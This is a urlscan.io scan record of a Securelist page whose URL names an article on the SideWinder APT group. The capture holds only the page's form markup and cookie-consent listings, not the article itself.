securelist.com
Open in
urlscan Pro
158.160.164.142
Public Scan
URL:
https://securelist.com/sidewinder-apt/114089/
Submission: On October 21 via api from DE — Scanned from CA
Submission: On October 21 via api from DE — Scanned from CA
Form analysis 12 forms found in the DOM
<form>
<fieldset>
<legend class="visuallyhidden">Consent Selection</legend>
<div id="CybotCookiebotDialogBodyFieldsetInnerContainer">
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonNecessary"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Necessary</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper CybotCookiebotDialogBodyLevelButtonSliderWrapperDisabled"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonNecessary"
class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelButtonDisabled" disabled="disabled" checked="checked"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonPreferences"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Preferences</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonPreferences" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonPreferencesInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonStatistics"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Statistics</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonStatistics" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonStatisticsInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonMarketing"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Marketing</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonMarketing" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonMarketingInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
</div>
</fieldset>
</form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonNecessaryInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelButtonDisabled" disabled="disabled" checked="checked"> <span
class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonPreferencesInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox" data-target="CybotCookiebotDialogBodyLevelButtonPreferences"
checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonStatisticsInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox" data-target="CybotCookiebotDialogBodyLevelButtonStatistics"
checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonMarketingInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox" data-target="CybotCookiebotDialogBodyLevelButtonMarketing" checked="checked"
tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyContentCheckboxPersonalInformation" class="CybotCookiebotDialogBodyLevelButton"> <span
class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form>GET https://securelist.com/
<form class="c-page-search__form c-page-search__form--small js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get">
<div class="c-form-element c-form-element--style-fill">
<div class="c-form-element__field wp_autosearch_form_wrapper">
<input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off">
</div>
</div>
<button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use>
</svg></button>
</form>GET https://securelist.com/
<form class="c-page-search__form js-main-search-popup js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get">
<div class="c-form-element c-form-element--style-fill">
<div class="c-form-element__field wp_autosearch_form_wrapper">
<input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off">
</div>
</div>
<button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use>
</svg></button>
</form>POST https://securelist.com/wp-comments-post.php
<form action="https://securelist.com/wp-comments-post.php" method="post" id="loginform" class="comment-form">
<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p>
<div class="comment-form-comment"><textarea id="comment" name="comment" style="width:100%" rows="8" aria-required="true" placeholder="Type your comment here"></textarea></div><!-- .comment-form-comment -->
<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" required="required"></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" required="required">
</p>
<script type="text/javascript">
document.addEventListener("input", function(event) {
if (!event.target.closest("#comment")) return;
try {
grecaptcha.render("recaptcha-submit-btn-area", {
"sitekey": "6LfQdrAaAAAAAEb_rTrwlbyc8z0Fa9CMjELY_2Ts",
"theme": "standard"
});
} catch (error) {
/*possible duplicated instances*/ }
});
</script>
<script src="https://www.google.com/recaptcha/api.js?hl=en&render=explicit" async="" defer=""></script>
<div id="recaptcha-submit-btn-area"> </div>
<noscript>
<style type="text/css">
#form-submit-save {
display: none;
}
</style>
<input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment">
</noscript>
<p class="form-submit"><input name="submit" type="submit" id="commentsubmit" class="submit" value="Comment"><a rel="nofollow" id="cancel-comment-reply-link" href="/sidewinder-apt/114089/#respond" style="display:none;">Cancel</a> <input
type="hidden" name="comment_post_ID" value="114089" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d1d513f1c6"></p>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js"
value="1729503742316">
<script>
document.getElementById("ak_js_1").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST /sidewinder-apt/114089/#gf_525169741
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_525169741" id="gform_525169741" class="subscribe-mc" action="/sidewinder-apt/114089/#gf_525169741">
<div class="gform-content-wrapper">
<div class="gform_body gform-body">
<div id="gform_fields_525169741" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<div class="ginput_container ginput_container_email">
<div class="fl-wrap fl-wrap-input"><label class="gfield_label screen-reader-text fl-label" for="input_525169741_1">Email(Required)</label><input name="input_1" id="input_525169741_1" type="text" value="" class="medium fl-input"
placeholder="Email(Required)" aria-required="true" aria-invalid="false" data-placeholder="Email"></div>
</div>
</div>
<div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_525169741_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</div>
<fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<legend class="gfield_label screen-reader-text gfield_label_before_complex"><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend>
<div class="ginput_container ginput_container_checkbox">
<div class="gfield_checkbox" id="input_525169741_2">
<div class="gchoice gchoice_11_2_1">
<input class="gfield-choice-input" name="input_2.1" type="checkbox" value="I agree" id="choice_525169741_11_2_1">
<label for="choice_525169741_11_2_1" id="label_525169741_11_2_1">I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time
via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label>
</div>
</div>
</div>
</fieldset>
</div>
</div>
<div class="gform_footer top_label"> <button type="submit" class="gform_button button" id="gform_submit_button_525169741" value="Sign up">
<svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use>
</svg> <span>Subscribe</span>
</button>
<input type="hidden" name="gform_ajax" value="form_id=11&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_11" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="11">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_11" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_11" id="gform_target_page_number_525169741_11" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_11" id="gform_source_page_number_525169741_11" value="1">
<input type="hidden" name="gform_random_id" value="525169741"><input type="hidden" name="gform_field_values" value="securelist_2020_form_location=sidebar">
</div>
</div>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js"
value="1729503742318">
<script>
document.getElementById("ak_js_2").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST /sidewinder-apt/114089/#gf_2844195349
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_2844195349" id="gform_2844195349" class="subscribe-mc" action="/sidewinder-apt/114089/#gf_2844195349">
<div class="gform-content-wrapper">
<div class="gform_body gform-body">
<div id="gform_fields_2844195349" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label screen-reader-text" for="input_2844195349_1">Email<span
class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label>
<div class="ginput_container ginput_container_email">
<input name="input_1" id="input_2844195349_1" type="text" value="" class="medium" placeholder="Email" aria-required="true" aria-invalid="false">
</div>
</div>
<div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_2844195349_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</div>
<fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<legend class="gfield_label screen-reader-text gfield_label_before_complex"><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend>
<div class="ginput_container ginput_container_checkbox">
<div class="gfield_checkbox" id="input_2844195349_2">
<div class="gchoice gchoice_11_2_1">
<input class="gfield-choice-input" name="input_2.1" type="checkbox" value="I agree" id="choice_2844195349_11_2_1">
<label for="choice_2844195349_11_2_1" id="label_2844195349_11_2_1">I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time
via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label>
</div>
</div>
</div>
</fieldset>
</div>
</div>
<div class="gform_footer top_label"> <button class="gform_button button" type="submit" id="gform_submit_button_2844195349" value="Sign up">
<svg class="o-icon o-svg-icon o-svg-large u-hidden u-inline-block@sm">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use>
</svg> <span class="u-hidden u-inline@sm">Subscribe</span>
<span class="u-hidden@sm"><svg class="o-icon o-svg-icon o-svg-right">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-arrow"></use>
</svg></span>
</button>
<input type="hidden" name="gform_ajax" value="form_id=11&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_11" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="11">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_11" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_11" id="gform_target_page_number_2844195349_11" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_11" id="gform_source_page_number_2844195349_11" value="1">
<input type="hidden" name="gform_random_id" value="2844195349"><input type="hidden" name="gform_field_values" value="securelist_2020_form_location=">
</div>
</div>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_3" name="ak_js"
value="1729503742394">
<script>
document.getElementById("ak_js_3").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST /sidewinder-apt/114089/#gf_2733215712
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_2733215712" id="gform_2733215712" class="subscribe-mc" action="/sidewinder-apt/114089/#gf_2733215712">
<div class="gform-content-wrapper">
<div class="gform_body gform-body">
<div id="gform_fields_2733215712" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<div class="ginput_container ginput_container_email">
<div class="fl-wrap fl-wrap-input"><label class="gfield_label screen-reader-text fl-label" for="input_2733215712_1">Email(Required)</label><input name="input_1" id="input_2733215712_1" type="text" value="" class="medium fl-input"
placeholder="Email(Required)" aria-required="true" aria-invalid="false" data-placeholder="Email"></div>
</div>
</div>
<div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_2733215712_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</div>
<fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<legend class="gfield_label screen-reader-text gfield_label_before_complex"><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend>
<div class="ginput_container ginput_container_checkbox">
<div class="gfield_checkbox" id="input_2733215712_2">
<div class="gchoice gchoice_11_2_1">
<input class="gfield-choice-input" name="input_2.1" type="checkbox" value="I agree" id="choice_2733215712_11_2_1">
<label for="choice_2733215712_11_2_1" id="label_2733215712_11_2_1">I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time
via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label>
</div>
</div>
</div>
</fieldset>
</div>
</div>
<div class="gform_footer top_label"> <button type="submit" class="gform_button button" id="gform_submit_button_2733215712" value="Sign up">
<svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use>
</svg> <span>Subscribe</span>
</button>
<input type="hidden" name="gform_ajax" value="form_id=11&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_11" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="11">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_11" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_11" id="gform_target_page_number_2733215712_11" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_11" id="gform_source_page_number_2733215712_11" value="1">
<input type="hidden" name="gform_random_id" value="2733215712"><input type="hidden" name="gform_field_values" value="securelist_2020_form_location=sidebar">
</div>
</div>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_4" name="ak_js"
value="1729503742417">
<script>
document.getElementById("ak_js_4").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>Text Content
* Consent
* Details
* [#IABV2SETTINGS#]
* About
THIS WEBSITE USES COOKIES
We use cookies to personalise content and ads, to provide social media features
and to analyse our traffic. We also share information about your use of our site
with our social media, advertising and analytics partners who may combine it
with other information that you’ve provided to them or that they’ve collected
from your use of their services.
Consent Selection
Necessary
Preferences
Statistics
Marketing
Show details
* Necessary 16
Necessary cookies help make a website usable by enabling basic functions like
page navigation and access to secure areas of the website. The website cannot
function properly without these cookies.
* Adobe Inc.
1
Learn more about this provider
demdexVia a unique ID that is used for semantic content analysis, the
user's navigation on the website is registered and linked to offline data
from surveys and similar registrations to display targeted ads.
Maximum Storage Duration: 180 daysType: HTTP Cookie
* Cookiebot
2
Learn more about this provider
CookieConsent [x2]Stores the user's cookie consent state for the current
domain
Maximum Storage Duration: 1 yearType: HTTP Cookie
* Google
5
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
ar_debug [x2]Checks whether a technical debugger-cookie is present.
Maximum Storage Duration: 30 daysType: HTTP Cookie
test_cookieUsed to check if the user's browser supports cookies.
Maximum Storage Duration: 1 dayType: HTTP Cookie
rc::aThis cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of
their website.
Maximum Storage Duration: PersistentType: HTML Local Storage
rc::cThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: SessionType: HTML Local Storage
* Kaspersky Lab
6
Learn more about this provider
AMCV_# [x2]Unique user ID that recognizes the user on returning visits
Maximum Storage Duration: 2 yearsType: HTTP Cookie
AMCVS_#AdobeOrg [x2]Pending
Maximum Storage Duration: SessionType: HTTP Cookie
test [x2]Used to detect if the visitor has accepted the marketing category
in the cookie banner. This cookie is necessary for GDPR-compliance of the
website.
Maximum Storage Duration: SessionType: HTTP Cookie
* s.go-mpulse.net
2
RT [x2]This cookie is used to identify the visitor through an application.
This allows the visitor to login to a website through their LinkedIn
application for example.
Maximum Storage Duration: 7 daysType: HTTP Cookie
* Preferences 1
Preference cookies enable a website to remember information that changes the
way the website behaves or looks, like your preferred language or the region
that you are in.
* Meta Platforms, Inc.
1
Learn more about this provider
__test__#Pending
Maximum Storage Duration: SessionType: HTML Local Storage
* Statistics 12
Statistic cookies help website owners to understand how visitors interact
with websites by collecting and reporting information anonymously.
* Google
8
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
_ga [x4]Registers a unique ID that is used to generate statistical data on
how the visitor uses the website.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
_gid [x2]Registers a unique ID that is used to generate statistical data
on how the visitor uses the website.
Maximum Storage Duration: 1 dayType: HTTP Cookie
_ga_# [x2]Used by Google Analytics to collect data on the number of times
a user has visited the website as well as dates for the first and most
recent visit.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
* Kaspersky Lab
3
Learn more about this provider
b/ss/#/1/#/s#Registers data on visitors' website-behaviour. This is used
for internal analysis and website optimization.
Maximum Storage Duration: SessionType: Pixel Tracker
s_cc [x2]Used to check if the user's browser supports cookies.
Maximum Storage Duration: SessionType: HTTP Cookie
* Linkedin
1
Learn more about this provider
browser_idUsed to recognise the visitor's browser upon reentry on the
website.
Maximum Storage Duration: 5 yearsType: HTTP Cookie
* Marketing 243
Marketing cookies are used to track visitors across websites. The intention
is to display ads that are relevant and engaging for the individual user and
thereby more valuable for publishers and third party advertisers.
* Meta Platforms, Inc.
5
Learn more about this provider
fbssls_#Collects data on the visitor’s use of the comment system on the
website, and what blogs/articles the visitor has read. This can be used
for marketing purposes.
Maximum Storage Duration: SessionType: HTML Local Storage
lastExternalReferrerDetects how the user reached the website by
registering their last URL-address.
Maximum Storage Duration: PersistentType: HTML Local Storage
lastExternalReferrerTimeDetects how the user reached the website by
registering their last URL-address.
Maximum Storage Duration: PersistentType: HTML Local Storage
_fbp [x2]Used by Facebook to deliver a series of advertisement products
such as real time bidding from third party advertisers.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
* Adobe Inc.
1
Learn more about this provider
_dpThis cookie is set by the audience manager of a website in order to
determine if any additional third-party cookies can be set in the
visitor’s browser – third-party cookies are used to gather information or
track visitor behavior on multiple websites. Third-party cookies are set
by a third-party website or company.
Maximum Storage Duration: SessionType: HTTP Cookie
* BrightTalk
1
Learn more about this provider
ga_clientIdUsed to send data to Google Analytics about the visitor's
device and behavior. Tracks the visitor across devices and marketing
channels.
Maximum Storage Duration: PersistentType: HTML Local Storage
* Google
210
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1006965183629;npa=0;auiddc=1741334667.1727440689;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fapt-reports%2F;u6=;u7=34074470008218519372750476360931839424-GA1.1.1003561276.1727Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1043375040084;npa=0;auiddc=772748748.1727437480;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fdavidjacoby%2F;u6=;u7=31545400873323004370189590018802031298-GA1.1.1079637347.1727437Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1136281656475;npa=0;auiddc=1006047884.1727437469;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fall%2Fpage%2F2%2F;u6=;u7=74701162234465427103023263702288778465-GA1.1.453751941.1727437468;u8Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1154080525829;npa=0;auiddc=1520788155.1727437612;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fdate%2F2001%2F;u6=;u7=56007863715010244441648772113335753513-GA1.1.1255026891.1727437611;u8=%Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1179023170268;npa=0;auiddc=1736351895.1727437468;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fdavidemm%2F;u6=;u7=51461359411083303274252091087366705161-GA1.1.592162233.1727437465Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1350888820149;npa=0;auiddc=740649151.1727437516;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fzaidisaid%2F;u6=;u7=35724714802519675674329581766149462783-GA1.1.1132197093.172743751Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1378718216465;npa=0;auiddc=466424996.1727440710;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fkaspersky-security-bulletin%2F;u6=;u7=03588684677260861412506795274173893996-GA1.1.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1380392419331;npa=0;auiddc=548991371.1727437536;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fgreat%2F;u6=;u7=29080252397984104063649600035788955601-GA1.1.77317704.1727437535;u8=%Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1406418246971;npa=0;auiddc=1115355834.1727437474;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fel-honeypot-de-winnti-un-manjar-para-atraer-a-los-intrusos%2F67109%2F;u6=;u7=4440507565203711Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1435254622623;npa=0;auiddc=325151567.1727440720;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcloudsorcerer-new-apt-cloud-actor%2F113056%2F;u6=;u7=44382221206167830604610070560722940386-GAPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1575114194904;npa=0;auiddc=480675657.1727440784;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Ftags%2F;u6=;u7=85633178148594568203293972727731941009-GA1.1.328314801.1727440781;u8=%5BtrafficPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1655007354526;npa=0;auiddc=1444344228.1727440736;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-2023-statistics%2F111156%2F;u6=;u7=17763994304988376323015638750074360749-GA1.1.476872498Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1946222208759;npa=0;auiddc=189566612.1727437494;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fsergeyb%2F;u6=;u7=76126348838953224970482449393243753886-GA1.1.2130357643.1727437493;Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1963930344969;npa=0;auiddc=1323265948.1727437520;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Felsayedelrefaei%2F;u6=;u7=19177724066486615300820337885865748050-GA1.1.685126654.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=1985899974183;npa=0;auiddc=1994713450.1727440674;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fwebinar-on-cyberattacks-in-ukraine-summary-and-qa%2F106075%2F;u6=;u7=174131343431158428632052Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2038135455159;npa=0;auiddc=1909372325.1727437502;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fentradas-de-soc-ti-e-ir%2F;u6=;u7=88321832680068830591497168361121406667-GA1.1.118Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2145116429749;npa=0;auiddc=616951068.1727440663;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fyuliyashlychkova%2F;u6=;u7=51590976392765035674593513926579870834-GA1.1.1969184989.17Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2157246743325;npa=0;auiddc=533378310.1727437563;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fdate%2F2004%2F;u6=;u7=36889677447199400363639635887368400758-GA1.1.1476794276.1727437562;u8=%5Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2266656496116;npa=0;auiddc=2056224775.1727437447;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fall%2F;u6=;u7=03343131188122676832679858225744353104-GA1.1.2024015419.1727437446;u8=%5BtraffiPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2365630686969;npa=0;auiddc=126450750.1727437516;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fksb-2023-statistics%2F98257%2F;u6=;u7=17926507604254317681136070652541253675-GA1.1.2115290662.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=257254335036;npa=0;auiddc=2053670124.1727437572;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fdate%2F2005%2F;u6=;u7=91247313559098413450331942620599423683-GA1.1.38164030.1727437571;u8=%5BtPending
Maximum Storage Duration: SessionType: Pixel Tracker
